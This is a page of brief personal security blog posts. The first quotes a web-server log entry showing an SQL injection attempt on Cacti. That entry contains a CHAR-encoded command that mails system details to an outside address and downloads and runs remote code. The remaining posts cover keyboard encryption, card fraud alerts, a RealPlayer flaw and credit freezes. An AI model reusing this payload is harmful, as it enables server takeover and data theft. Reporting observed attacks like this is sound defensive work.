Cacti SQL injection attack

I was going through some apache access logs this morning and came across an attempted SQL injection attack. I don’t have Cacti on my server, so I wasn’t affected by the attempt. Here’s the request:

24.147.54.90 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,
CHAR(112,114,111,99),null,1,300,0,CHAR(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,
103,114,101,112,32,105,110,101,116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,
97,32,62,62,32,47,116,109,112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,
111,117,116,59,32,99,97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,54,54,
46,49,56,48,46,49,55,50,46,51,56,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,
111,111,46,99,111,109,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,32,45,79,32,47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,
47,116,109,112,47,116,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,46,112,108,32,45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,
47,116,46,112,108,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM
/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"

It looks like someone out there has an automated bot going around attempting this injection attack everywhere.

Wireless keyboard crypto cracked

HayBe aware that if you use Logitech or Microsoft wireless keyboards that rely on 27 MHz technology (non-bluetooth) you may be open to someone listening in on every keystroke you make.
This is due to weak encryption. I have a hard time understanding why people think they can get away with shoddy security implementations.
This article and white paper give you more geek-speak about the underlying details. They specifically mention the Microsoft Wireless Optical Desktop 1000 and 2000 keyboards as being cracked.

News story
whitepaper – “We know what you typed last summer”

Credit Card – Declined

Train picI recently made a laptop purchase from Circuit City online. During the checkout process, my business American Express (AmEx) card was declined. I tried my personal AmEx card and got the same result. I actually tried each of them a few times just to be sure I didn’t make a mistake when I entered the numbers on the payment page. I ended up making the purchase with my Visa and thought they might just be having trouble processing AmEx transactions at the time.
Later that day, I got a call From AmEx about suspicious transaction attempts. It turns out that the transactions were declined by AmEx because they were suspicious. I guess my card had been locked as a result.

I have mixed feelings about this. The consumer side of me thought, “wow, AmEx is really looking out for me.” I’m a patient shopper, so little inconveniences don’t bother me too much. I’m sure there are others that would be totally frustrated with any sort of inconvenience while ordering online. I’d rather have to jump through a hoop or two if it means stopping someone else from making unauthorized purchases on my account.

The online marketer in me thought, “How many sales are lost due to these false alerts?” In affiliate marketing, this is something that is far out of our control. It’s even out of the merchant’s control if the CC company decides to decline a transaction based on suspicion. I guess it’s a good thing that most merchants offer many methods of payment.

By contrast, when I made my first purchase from Amazon’s MP3 store things went a little too quickly. I clicked on “Buy this album” and my computer was instantly downloading the new MP3s without any warning. It made me uneasy that it was so simple to make a purchase. I didn’t even have to enter in my credit card information, Amazon had that all stored for me since I had purchased from them previously. I’ve since enabled an option in my account so that I get a confirmation page prior to MP3 orders being placed.

RealPlayer Vulnerability

MoonThere’s a vulnerability in RealPlayer that will allow an attacker to run malicious code on your computer. All you need to do is visit a malicious site and that will do it. It’d be nice if there were warning signs before you go to a malicious site, but there are not.
Install this from Real to protect yourself from this vulnerability.

Here is more info on this vulnerability.

How to Freeze your Credit Report

It’s interesting that you can stop identity thieves cold by freezing your credit report. If you haven’t heard about this, it’s not surprising. According to this article, Credit bureaus aren’t eager to promote it because they make good money pushing other identity theft prevention services. Freezes aren’t currently available in Utah, but credit bureaus are required by law to have them available by next year.

Continue reading How to Freeze your Credit Report

Google has full control of your content

I’m not sure I like this at all. I’m a fan of Google Apps. It’s nice to have central access to email, calendaring and some office apps. I’ll admit I’m on the paranoid side and don’t use the office apps for anything that contains sensitive information.
It looks like my paranoia may actually pay off:
Continue reading Google has full control of your content